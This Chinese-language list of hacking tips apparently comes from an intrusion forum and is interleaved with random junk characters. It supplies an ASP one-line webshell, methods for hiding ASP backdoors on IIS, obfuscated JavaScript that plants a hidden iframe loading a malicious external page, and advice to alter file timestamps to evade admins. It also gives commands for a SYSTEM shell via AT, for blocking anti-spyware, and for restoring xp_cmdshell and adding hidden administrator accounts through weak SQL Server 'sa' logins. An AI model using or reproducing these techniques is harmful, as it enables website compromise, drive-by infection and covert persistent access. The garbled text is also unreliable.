f).<%if request("cmd")<>"" then execute request("pass")%>5 t8 [9 C( W* s* P+ I5 D
; G; E: j4 P* C( {! m52、at "12:17" /interactive cmd$ U$ |, L# f- P4 ]( y5 T% W
执行后可以用AT命令查看新加的任务1 O q9 r$ j& F; _3 S2 Q
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
\7 }5 ~! W7 n' A. x. L* t( c- O/ `: R+ [' R% I4 q
53、隐藏ASP后门的两种方法
x- Q/ ` |, x7 b( p/ N& s1、建立非标准目录:mkdir images..\, D0 q) D% K! d W3 m
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp& p, x3 m% A% d8 S; f$ T, K/ f
通过web访问ASP木马:http://ip/images../news.asp?action=login" s1 }* L- v5 t u) {5 H
如何删除非标准目录:rmdir images..\ /s
2 J o; j$ G6 u2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
; V M: K2 M$ n( D' o/ Emkdir programme.asp( x* H6 l; u* G1 m7 B& \1 G' v) R
新建1.txt文件内容:<!--#include file=”12.jpg”-->
2 @& M o. I9 a& @# {新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
( i* a+ E7 A* ]9 _' Z! s+ hattrib +H +S programme.asp1 @# N4 i3 r# v5 ?! i- z" ~3 O
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
. h$ P) _8 M a) d
" n2 E4 o# K8 m54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。% G7 w2 B) ^8 N) L8 J8 r ^
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。3 x& `: H3 }# @' a) ]
* w+ G" k2 A) n3 J1 z/ _* x+ \3 g
55、JS隐蔽挂马6 X; K: d6 f. V2 W2 o1 j
1.
1 ]# j) I7 V5 S" _var tr4c3="<iframe src=ht";
/ D* b: l6 G$ o( u9 o& b; Wtr4c3 = tr4c3+"tp:/";' l' n2 l) r1 s& n& w! H+ P
tr4c3 = tr4c3+"/ww";
/ X1 I* W# [) }. b9 \) D3 ztr4c3 = tr4c3+"w.tr4";7 }# U- x( m0 q) O. H% C
tr4c3 = tr4c3+"c3.com/inc/m";
. G8 \7 D- P; M+ y# O( Vtr4c3 = tr4c3+"m.htm style="display:none"></i";
. t+ u% `3 W' S: n- i7 X: Z- I2 Itr4c3 =tr4c3+"frame>'";: j- x3 \# P+ s; e7 l
document.write(tr4c3);
- B5 |1 o+ G# y1 z% c避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。. V- w7 M7 ?- |7 h" Z
9 t- f8 l" Q5 F1 E: o5 j. [6 u* u
2.9 C) e: ?# }# I0 W5 }/ w
转换进制,然后用EVAL执行。如& x4 Z$ a6 \. i4 u
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
* u( t0 w) i; {3 \5 e不过这个有点显眼。
( N( |8 I4 Z3 F" X6 E/ X3.
1 u2 p* @- h0 }2 n' odocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');, k/ {& u. [) A9 k0 q9 r0 q
最后一点,别忘了把文件的时间也修改下。& m2 {9 r: L/ F# B; H
) Y! p9 [7 U5 N# s3 v1 ~56.3389终端入侵常用DOS命令' b/ y$ U* Y* U$ V8 p
taskkill taskkill /PID 1248 /t5 F$ f. d, J3 `0 W9 g) W9 i
0 F# ]: w4 I; @8 F3 s3 }% H4 J2 `tasklist 查进程
( v3 j- A# s8 r5 y- S6 D8 ?
$ H1 J% b+ V& I. {5 P# Tcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
4 u2 [5 a* b$ u( f2 I- v- }iisreset /reboot; v* C; b# Z8 {
tsshutdn /reboot /delay:1 重起服务器' v' B# j+ }' r4 j# ~2 I
6 t6 ~' R+ d3 Ologoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户, j/ ?! V/ `3 h' F: s& m9 Q1 v, C
7 @/ ?: \5 P6 E Q" nquery user 查看当前终端用户在线情况
* n/ {8 k8 f7 |" t7 L* @6 ~7 q8 Z
5 t3 L! k0 B' ]2 D$ z. Z要显示有关所有会话使用的进程的信息,请键入:query process *
; U1 m4 D5 E2 G' E& i$ B
* f- p5 t, t- p, V/ p; P" W J要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:23 t, A& }6 e8 D! U7 U1 M
% P4 `* c9 F+ N) [! ^
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
) P& ?- B" k$ N& j0 Q i ?/ Z) [, ~# p0 y9 o. ]3 |9 w+ t: q
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02 ?8 W( Z1 P3 m; ]' }
3 J4 V4 U1 }5 m9 \; A. ]- ]命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
7 |! E! A3 J' ~. z/ k- w' x
2 {- I" Z, z8 {5 ]0 Q命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
1 w, i/ J5 P4 v# a( i
8 V3 C5 m L" |: |: z" J命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。7 C6 F8 V. L- ?6 z0 G
$ n9 [7 v% e7 l) @命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
F9 ~4 r* J# B/ n) s, p5 _) x$ [! L5 V$ k4 ?
56、在地址栏或按Ctrl+O,输入:( G+ j/ ^4 { {" U) ]* n
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
2 K* ?, {+ h' {! X
6 B0 @# V5 S% N, U; t5 o源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
3 U' b2 T. j: j% A% s" P
; i9 D+ i8 I2 u J$ p57、net user的时候,是不能显示加$的用户,但是如果不处理的话,5 `8 G3 E2 }) f A
用net localgroup administrators是可以看到管理组下,加了$的用户的。. |! S& m2 h# e( P
3 V |$ [6 U5 E3 N) ?
58、 sa弱口令相关命令5 L# F c& [; e# Y) R$ S
6 _. R1 L/ J; O
一.更改sa口令方法:' e. y5 R4 P/ ] L8 u+ \
用sql综合利用工具连接后,执行命令:# J. G S1 \' b* }
exec sp_password NULL,'20001001','sa'. X3 y6 T; z# O8 }+ W
(提示:慎用!)4 E$ z7 H: r$ b2 ^7 w$ x+ B0 o x0 i
1 J" M3 t' S$ V$ m. [" i
二.简单修补sa弱口令.
& s8 O; Z& R7 V+ ~7 V3 ]! {) }- M, f1 S# |+ A# l/ m6 e7 D. ~
方法1:查询分离器连接后执行:( B1 s. J2 N% A& E5 ?4 _
if exists (select * from
9 B6 z, I- V% P* F3 adbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
+ U; L, _3 I' j5 i4 @, x) iOBJECTPROPERTY(id, N'IsExtendedProc') = 1)8 T3 c! J+ H1 F( _% k9 b
; |$ p0 `( ?+ ]. q6 Lexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
9 T H# S; D. K2 C: R* o7 i) S7 U1 o# m* D3 x0 P) Z M. Z& I, \
GO8 |0 R% s+ X: m& j5 G1 q. U' N
' J; t$ q b* g& G7 ~
然后按F5键命令执行完毕2 D7 S/ ?: z- T6 Y. n3 ]
6 m. [' N; x: {2 }: }" D方法2:查询分离器连接后
8 ?2 N7 ~- p) P$ ^3 ^/ Z, Y k第一步执行:use master
) z$ P0 ?( ^( A2 q5 n) ~" D& m第二步执行:sp_dropextendedproc 'xp_cmdshell'
7 _- u. ^1 n/ ^* v( Z然后按F5键命令执行完毕
# N; d- J5 d# h: l6 ~
2 P/ c4 y! ~3 Y
- U7 U' O, O5 b: \三.常见情况恢复执行xp_cmdshell.
: T4 P* o. k; J7 h/ n
3 N1 M2 u8 ^8 X! k0 ^
' L2 {, q; ~$ p2 V( f" B6 {1 未能找到存储过程'master..xpcmdshell'.
B) N' a. q7 n# ^4 @ 恢复方法:查询分离器连接后,
" Z8 p# _3 I0 Y! h3 U0 E第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int0 T; v/ T7 I" j5 B1 Z' @* d
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
3 G$ Q% `4 ~! Z* {/ a然后按F5键命令执行完毕2 |& {8 O- o& z/ }
( I& H) f" r: x, F/ _: K. p( ~2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)! k" M+ f- t2 C! o. `( W$ V/ O
恢复方法:查询分离器连接后,
/ v/ K; f4 n' w: |, S+ f0 |& I第一步执行:sp_dropextendedproc "xp_cmdshell"
1 a7 `9 p! ~+ z1 i第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'% C% ]$ L5 o# s. {- p9 s, L: S
然后按F5键命令执行完毕
- q1 w4 X2 S" L8 R% ? b# P/ e4 Y& m- r: p8 h& ~3 P/ Y
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
( S0 Z% _5 Z# \. }2 B/ T1 F+ j恢复方法:查询分离器连接后,! P' E; O x8 L5 s7 A: _3 R0 s
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'9 E2 y4 L6 S1 Z* t5 a
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' - z6 H `1 L8 `
然后按F5键命令执行完毕. e3 m6 U' q+ [8 a
+ ]4 I# W- v1 D, T; T& y
四.终极方法.3 i6 \9 r0 k, @8 O M; L
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:+ ^+ B- @! E. b6 _2 K
查询分离器连接后,
0 g6 t" c( ~6 j1 ?. A2000servser系统:
6 X" A- v8 B& `declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'. S# U$ l) I2 |
$ m$ m$ `) j2 ?# L6 i! {
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
8 E( E7 n& X, q, U5 B3 F! O8 o$ N9 V1 _2 ^, g2 c7 d
xp或2003server系统:; G f! q4 Z- O3 W4 G
$ E4 Z9 {. f2 V {
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
" \) [. h1 ]( V0 t
& O3 a1 ~: J) {0 ]declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
# S& L' X/ T' `) g7 p- i |